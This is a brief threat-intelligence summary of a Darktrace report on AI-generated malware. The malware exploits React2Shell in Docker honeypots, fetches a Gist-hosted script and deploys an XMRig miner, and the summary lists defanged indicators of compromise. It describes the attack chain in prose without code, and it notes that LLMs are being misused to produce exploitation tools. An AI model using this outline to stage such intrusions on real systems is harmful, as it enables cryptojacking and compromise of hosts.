DARKTRACE has identified an AI/LLM-generated malware sample that targets its Cloudypots environment by exploiting a React2Shell vulnerability, illustrating how large language models can accelerate the production of exploitation tools for low‑skill attackers.
The report describes an attack chain starting with an AI‑generated Docker-based intrusion into a honeypot, where a container named “python-metrics-collector” is spawned and equipped with curl, wget and Python, before downloading Python packages and executing a script from a GitHub Gist linked to a user who has since been banned.
The well‑documented payload forms a React2Shell exploitation toolkit designed to achieve remote code execution and deploy a Monero miner (XMRig), with a multi‑stage, obfuscated process that includes a Next[.]js server component payload and a crafted command execution path.
Darktrace notes that the operation infected at least 91 hosts, with a spreader IP registered to a residential ISP in India (49.36.33[.]11) and a central spreader server likely deployed by the attacker, though the analysis confirms no Docker spreader within this sample. Indicators of compromise include a malware host domain smplu[.]link and specific IoCs such as a set of associated hashes.